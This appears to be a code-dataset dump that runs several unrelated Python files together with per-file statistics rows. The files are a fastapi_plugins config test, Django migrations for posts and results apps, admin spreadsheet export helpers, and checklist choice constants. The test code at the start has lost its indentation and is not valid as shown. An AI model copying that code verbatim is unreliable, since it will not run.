class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
from fastapi_plugins.settings import _manager
exp = {}
res = _manager._settings_map
self.assertTrue(res == exp, 'reset init failed')
fastapi_plugins.register_config(MyConfig)
exp = {fastapi_plugins.CONFIG_NAME_DOCKER: MyConfig}
res = _manager._settings_map
self.assertTrue(res == exp, 'reset register failed')
fastapi_plugins.reset_config()
exp = {}
res = _manager._settings_map
self.assertTrue(res == exp, 'reset failed')
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config(self):
try:
@fastapi_plugins.registered_configuration
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed: %s != %s' % (exp, res)) # noqa E501
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_docker(self):
try:
@fastapi_plugins.registered_configuration_docker
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
# docker is default
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_DOCKER).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_local(self):
try:
@fastapi_plugins.registered_configuration_local
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_LOCAL).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_LOCAL # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_test(self):
try:
@fastapi_plugins.registered_configuration_test
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
#
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(fastapi_plugins.CONFIG_NAME_TEST).dict()) # noqa E501
self.assertTrue(res == exp, 'get configuration failed')
#
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_TEST # noqa E501
try:
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config().dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
finally:
fastapi_plugins.reset_config()
def test_decorator_register_config_by_name(self):
try:
name = 'myconfig'
@fastapi_plugins.registered_configuration(name=name)
class MyConfig(fastapi_plugins.PluginSettings):
api_name: str = 'API name'
exp = d2json(MyConfig().dict())
res = d2json(fastapi_plugins.get_config(name).dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
fastapi_plugins.reset_config()
def test_app_config(self):
async def _test():
@fastapi_plugins.registered_configuration
class MyConfigDocker(fastapi_plugins.PluginSettings):
api_name: str = 'docker'
@fastapi_plugins.registered_configuration_local
class MyConfigLocal(fastapi_plugins.PluginSettings):
api_name: str = 'local'
app = fastapi_plugins.register_middleware(fastapi.FastAPI())
config = fastapi_plugins.get_config()
await fastapi_plugins.config_plugin.init_app(app=app, config=config) # noqa E501
await fastapi_plugins.config_plugin.init()
try:
c = await fastapi_plugins.config_plugin()
exp = d2json(MyConfigDocker().dict())
res = d2json(c.dict())
self.assertTrue(res == exp, 'get configuration failed')
finally:
await fastapi_plugins.config_plugin.terminate()
fastapi_plugins.reset_config()
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
        # _test is already a coroutine function; the deprecated asyncio.coroutine wrapper is unnecessary
        event_loop.run_until_complete(_test())
event_loop.close()
def test_app_config_environ(self):
async def _test():
os.environ[fastapi_plugins.DEFAULT_CONFIG_ENVVAR] = fastapi_plugins.CONFIG_NAME_LOCAL # noqa E501
try:
@fastapi_plugins.registered_configuration
class MyConfigDocker(fastapi_plugins.PluginSettings):
api_name: str = 'docker'
@fastapi_plugins.registered_configuration_local
class MyConfigLocal(fastapi_plugins.PluginSettings):
api_name: str = 'local'
app = fastapi_plugins.register_middleware(fastapi.FastAPI())
config = fastapi_plugins.get_config()
await fastapi_plugins.config_plugin.init_app(app=app, config=config) # noqa E501
await fastapi_plugins.config_plugin.init()
try:
c = await fastapi_plugins.config_plugin()
exp = d2json(MyConfigLocal().dict())
res = d2json(c.dict())
self.assertTrue(res == exp, 'get configuration failed: %s != %s' % (exp, res)) # noqa E501
finally:
await fastapi_plugins.config_plugin.terminate()
finally:
os.environ.pop(fastapi_plugins.DEFAULT_CONFIG_ENVVAR)
fastapi_plugins.reset_config()
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
        # _test is already a coroutine function; the deprecated asyncio.coroutine wrapper is unnecessary
        event_loop.run_until_complete(_test())
event_loop.close()
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 35.748219 | 111 | 0.606047 | 1,560 | 15,050 | 5.580769 | 0.073718 | 0.186538 | 0.060533 | 0.071215 | 0.895245 | 0.871468 | 0.842063 | 0.832874 | 0.82759 | 0.81553 | 0 | 0.009363 | 0.297475 | 15,050 | 420 | 112 | 35.833333 | 0.814055 | 0.030432 | 0 | 0.805732 | 0 | 0 | 0.068989 | 0.00158 | 0 | 0 | 0 | 0 | 0.098726 | 1 | 0.070064 | false | 0.003185 | 0.035032 | 0 | 0.178344 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9dcbf5b13d46002ec822a177b37a28035e404448 | 206 | py | Python | spacy/cli/converters/__init__.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 12 | 2019-03-20T20:43:47.000Z | 2020-04-13T11:10:52.000Z | spacy/cli/converters/__init__.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 13 | 2018-06-05T11:54:40.000Z | 2019-07-02T11:33:14.000Z | spacy/cli/converters/__init__.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 4 | 2019-06-07T13:02:33.000Z | 2021-07-07T07:34:35.000Z | from .conllu2json import conllu2json # noqa: F401
from .iob2json import iob2json # noqa: F401
from .conll_ner2json import conll_ner2json # noqa: F401
from .jsonl2json import ner_jsonl2json # noqa: F401
| 41.2 | 56 | 0.786408 | 27 | 206 | 5.888889 | 0.37037 | 0.201258 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114943 | 0.15534 | 206 | 4 | 57 | 51.5 | 0.798851 | 0.208738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9dd3288350ff48df521766dbac806f2e5c63670e | 15,342 | py | Python | backend/project/posts/migrations/0001_initial.py | winoutt/winoutt-django | f48dfd933b3c12286f973701676eb2c2ab2bff73 | [
"MIT"
] | null | null | null | backend/project/posts/migrations/0001_initial.py | winoutt/winoutt-django | f48dfd933b3c12286f973701676eb2c2ab2bff73 | [
"MIT"
] | null | null | null | backend/project/posts/migrations/0001_initial.py | winoutt/winoutt-django | f48dfd933b3c12286f973701676eb2c2ab2bff73 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-01 16:58
import datetime
from django.conf import settings
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import django_resized.forms
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('teams', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('comment_id', models.AutoField(primary_key=True, serialize=False)),
('content', models.TextField()),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Hashtag',
fields=[
('hashtag_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255, unique=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Poll',
fields=[
('poll_id', models.AutoField(primary_key=True, serialize=False)),
('question', models.CharField(max_length=255)),
('end_at', models.DateTimeField()),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='PollChoice',
fields=[
('poll_choice_id', models.AutoField(primary_key=True, serialize=False)),
('value', models.CharField(max_length=255)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('poll', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.poll')),
],
),
migrations.CreateModel(
name='Post',
fields=[
('post_id', models.AutoField(primary_key=True, serialize=False)),
('caption', models.TextField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='teams.team')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Star',
fields=[
('star_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostUnfollow',
fields=[
('post_unfollow_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostMention',
fields=[
('post_mention_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostHashtag',
fields=[
('post_hashtag_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('hashtag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.hashtag')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
],
),
migrations.CreateModel(
name='PostContent',
fields=[
('post_content_id', models.AutoField(primary_key=True, serialize=False)),
('post_content_type', models.CharField(max_length=8)),
('body', models.TextField(blank=True, null=True)),
('photo_original', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[1920, 1080], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_images/'), upload_to='')),
('cover', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[200, 200], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_covers/'), upload_to='')),
('cover_original', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[1920, 1080], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_covers/'), upload_to='')),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
],
),
migrations.CreateModel(
name='PostAlbum',
fields=[
('post_album_id', models.AutoField(primary_key=True, serialize=False)),
('photo', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[200, 200], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_images/'), upload_to='')),
('photo_original', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[1920, 1080], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_images/'), upload_to='')),
('filename', models.FileField(blank=True, null=True, storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_files/'), upload_to='')),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
],
),
migrations.CreateModel(
name='PollVote',
fields=[
('poll_vote_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('poll', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.poll')),
('poll_choice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.pollchoice')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='poll',
name='post',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='posts.post'),
),
migrations.CreateModel(
name='LinkPreview',
fields=[
('link_preview_id', models.AutoField(primary_key=True, serialize=False)),
('previewable_id', models.BigIntegerField(blank=True, null=True)),
('title', models.CharField(max_length=255)),
('description', models.TextField()),
('url', models.CharField(max_length=255)),
('image', models.CharField(max_length=255)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('previewable_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
],
),
migrations.CreateModel(
name='Favorite',
fields=[
('favorite_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CommentVote',
fields=[
('comment_vote_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.comment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CommentMention',
fields=[
('comment_mention_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.comment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CommentHashtag',
fields=[
('comment_hashtag_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.comment')),
('hashtag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.hashtag')),
],
),
migrations.AddField(
model_name='comment',
name='post',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='AuthorStarView',
fields=[
('author_star_view_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]

# File: arcreg/blueslip/export.py (repo: CodeFanatic23/ARCRegistration, MIT license)
import csv
import xlwt
from django.utils.encoding import smart_str
import openpyxl
from openpyxl.utils import get_column_letter
from django.http import HttpResponse
class ExportRemove:
    def export_csv(self, modeladmin, request, queryset):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=REMOVE_CASES.csv'
writer = csv.writer(response, csv.excel)
response.write(u'\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)
writer.writerow([
smart_str(u"ID"),
smart_str(u"Name"),
smart_str(u"ID_no"),
smart_str(u"Course ID"),
smart_str(u"Class No."),
smart_str(u"Course Title"),
smart_str(u"Lecture"),
smart_str(u"Tutorial"),
smart_str(u"Practical"),
smart_str(u"Graded Component"),
smart_str(u"Project Component"),
])
for obj in queryset:
writer.writerow([
smart_str(obj.pk),
smart_str(obj.name),
smart_str(obj.ID_no),
smart_str(obj.course_id),
smart_str(obj.class_nbr),
smart_str(obj.course_title),
smart_str(obj.lecture_no),
smart_str(obj.tutorial_no),
smart_str(obj.practical_no),
smart_str(obj.graded_comp),
smart_str(obj.project_section),
])
return response
    def export_xls(self, modeladmin, request, queryset):
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename=REMOVE_CASES.xls'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet("REMOVE_CASES")
row_num = 0
columns = [
(u"ID", 2000),
(u"Name", 6000),
(u"ID No.", 8000),
(u"Course ID", 8000),
(u"Class No.", 8000),
(u"Course Title", 8000),
(u"Lecture", 8000),
(u"Tutorial", 8000),
(u"Practical", 8000),
(u"Graded Component", 8000),
(u"Project Component", 8000),
]
font_style = xlwt.XFStyle()
font_style.font.bold = True
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num][0], font_style)
# set column width
ws.col(col_num).width = columns[col_num][1]
font_style = xlwt.XFStyle()
font_style.alignment.wrap = 1
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
    def export_xlsx(self, modeladmin, request, queryset):
response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
response['Content-Disposition'] = 'attachment; filename=REMOVE_CASES.xlsx'
wb = openpyxl.Workbook()
        ws = wb.active  # get_active_sheet() is deprecated in openpyxl
ws.title = "REMOVE_CASES"
row_num = 0
columns = [
(u"ID", 15),
(u"Name", 70),
(u"ID No.", 70),
(u"Course ID", 70),
(u"Class No.", 70),
(u"Course Title", 70),
(u"Lecture", 70),
(u"Tutorial", 70),
(u"Practical", 70),
(u"Graded Component", 70),
(u"Project Component", 70),
]
for col_num in range(len(columns)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = columns[col_num][0]
c.font = c.font.copy(bold = True)
# set column width
ws.column_dimensions[get_column_letter(col_num+1)].width = columns[col_num][1]
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = row[col_num]
c.alignment = c.alignment.copy(wrap_text = True)
wb.save(response)
return response
class ExportAdd:
    def export_csv(self, modeladmin, request, queryset):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=ADD_CASES.csv'
writer = csv.writer(response, csv.excel)
response.write(u'\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)
writer.writerow([
smart_str(u"ID"),
smart_str(u"Name"),
smart_str(u"ID_no"),
smart_str(u"Course ID"),
smart_str(u"Class No."),
smart_str(u"Course Title"),
smart_str(u"Lecture"),
smart_str(u"Tutorial"),
smart_str(u"Practical"),
smart_str(u"Graded Component"),
smart_str(u"Project Component"),
])
for obj in queryset:
writer.writerow([
smart_str(obj.pk),
smart_str(obj.name),
smart_str(obj.ID_no),
smart_str(obj.course_id),
smart_str(obj.class_nbr),
smart_str(obj.course_title),
smart_str(obj.lecture_no),
smart_str(obj.tutorial_no),
smart_str(obj.practical_no),
smart_str(obj.graded_comp),
smart_str(obj.project_section),
])
return response
    def export_xls(self, modeladmin, request, queryset):
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename=ADD_CASES.xls'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet("ADD_CASES")
row_num = 0
columns = [
(u"ID", 2000),
(u"Name", 6000),
(u"ID No.", 8000),
(u"Course ID", 8000),
(u"Class No.", 8000),
(u"Course Title", 8000),
(u"Lecture", 8000),
(u"Tutorial", 8000),
(u"Practical", 8000),
(u"Graded Component", 8000),
(u"Project Component", 8000),
]
font_style = xlwt.XFStyle()
font_style.font.bold = True
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num][0], font_style)
# set column width
ws.col(col_num).width = columns[col_num][1]
font_style = xlwt.XFStyle()
font_style.alignment.wrap = 1
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
    def export_xlsx(self, modeladmin, request, queryset):
response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
response['Content-Disposition'] = 'attachment; filename=ADD_CASES.xlsx'
wb = openpyxl.Workbook()
        ws = wb.active  # get_active_sheet() is deprecated in openpyxl
ws.title = "ADD_CASES"
row_num = 0
columns = [
(u"ID", 15),
(u"Name", 70),
(u"ID No.", 70),
(u"Course ID", 70),
(u"Class No.", 70),
(u"Course Title", 70),
(u"Lecture", 70),
(u"Tutorial", 70),
(u"Practical", 70),
(u"Graded Component", 70),
(u"Project Component", 70),
]
for col_num in range(len(columns)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = columns[col_num][0]
c.font = c.font.copy(bold = True)
# set column width
ws.column_dimensions[get_column_letter(col_num+1)].width = columns[col_num][1]
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = row[col_num]
c.alignment = c.alignment.copy(wrap_text = True)
wb.save(response)
        return response
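The `export_csv` methods above write a UTF-8 byte-order mark before the rows so that Excel detects the encoding. A minimal standalone sketch of that technique, using an in-memory buffer in place of the `HttpResponse` (the buffer setup is an assumption for illustration only):

```python
import csv
import io

# Write a UTF-8 BOM, then CSV rows, into an in-memory buffer. Excel uses the
# BOM to recognise the file as UTF-8 instead of the local 8-bit codepage.
buf = io.BytesIO()
buf.write(u'\ufeff'.encode('utf8'))            # byte-order mark, as in export_csv
text = io.TextIOWrapper(buf, encoding='utf8', newline='')
writer = csv.writer(text, csv.excel)
writer.writerow(['ID', 'Name'])
writer.writerow(['1', 'Zoë'])
text.flush()

data = buf.getvalue()
assert data.startswith(b'\xef\xbb\xbf')        # BOM is the first three bytes
assert data.decode('utf-8-sig').startswith('ID,Name')
```

Decoding with `utf-8-sig` strips the BOM again, which is why the header row comes back clean.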

# File: result/migrations/tab/0072_auto_20200105_0926.py (repo: Uqhs-1/uqhs, MIT license)
# Generated by Django 2.1.3 on 2020-01-05 07:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('result', '0071_auto_20191229_0935'),
]
operations = [
migrations.AlterField(
model_name='btutor',
name='created',
field=models.DateTimeField(default='2020-01-05', max_length=200),
),
migrations.AlterField(
model_name='downloadformat',
name='created',
field=models.DateTimeField(default='2020-01-05', max_length=200),
),
migrations.AlterField(
model_name='qsubject',
name='agn',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='atd',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='exam',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='test',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='total',
field=models.FloatField(blank=True, default=0, max_length=4, null=True),
),
]
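The migrations in this dump use two styles of `DateTimeField` default: a callable (`default=datetime.datetime.now`) and a literal (`default='2020-01-05'`). A plain-Python sketch of the difference — no Django required, and the analogy is an assumption for illustration:

```python
import datetime

# A literal default is evaluated once, when the module loads; a callable
# default is invoked again for every new row that needs a value.
frozen = datetime.datetime.now()        # like default='2020-01-05' (fixed value)
per_row = datetime.datetime.now         # like default=datetime.datetime.now

assert callable(per_row) and not callable(frozen)
assert per_row() >= frozen              # each invocation returns the current time
```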

# File: woffle/embed/numeric/fasttext/__init__.py (repo: karetsu/chatter, MIT license)
# list operations
from .embed import embed
# element operations
from .embed import embed_

# File: geokey_checklist/base.py (repo: prickles/geokey-checklist, MIT license)
from model_utils import Choices
TYPE = Choices(
('Home', 'Home'),
('Work', 'Work'),
('School', 'School'),
('PlaceOfWorship', 'Place of Worship'),
('Vehicle', 'Vehicle'),
('Blank', 'Blank')
)
ITEM_TYPE = Choices(
('Essential', 'Essential'),
('Useful', 'Useful'),
('Personal', 'Personal'),
('Fixit', 'Fix It'),
('Children', 'Children'),
('Toddlers', 'Toddlers'),
('Infants', 'Infants'),
('Pets', 'Pets'),
('Custom', 'Custom')
)
EXPIRY_FACTOR = Choices(
('-1', 'Yesterday'), #this is only for testing purposes
('30', 'One Month'),
('60', 'Two Months'),
('90', 'Three Months'),
('180', 'Six Months'),
('270', 'Nine Months'),
('365', 'One Year'),
('730', 'Two Years'),
('1825', 'Five Years'),
('999999', 'Never')
)
PER_TYPE = Choices(
('individual', 'Per Individual'),
('location', 'Per Location')
)
FREQUENCY_EXPIRED_REMINDER = Choices(
(30, 'one_month', 'every month'),
(60, 'two_months', 'every two months'),
(90, 'three_months', 'every three months'),
(180, 'six_months', 'every six months'),
(365, 'one_year', 'once a year')
)
REMINDER_BEFORE_EXPIRATION = Choices(
(180, 'six_months', 'six months'),
(90, 'three_months', 'three months'),
(30, 'one_month', 'one month'),
(7, 'one_week', 'one week'),
(1, 'one_day', 'one day'),
(999999, 'never', 'never')
)
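Each item definition below carries a `quantityfactor` and a `pertype` (`PER_TYPE` above). A hypothetical sketch of how those two fields might combine into a required quantity — the function name and this exact rule are assumptions for illustration; the plugin's real logic lives elsewhere:

```python
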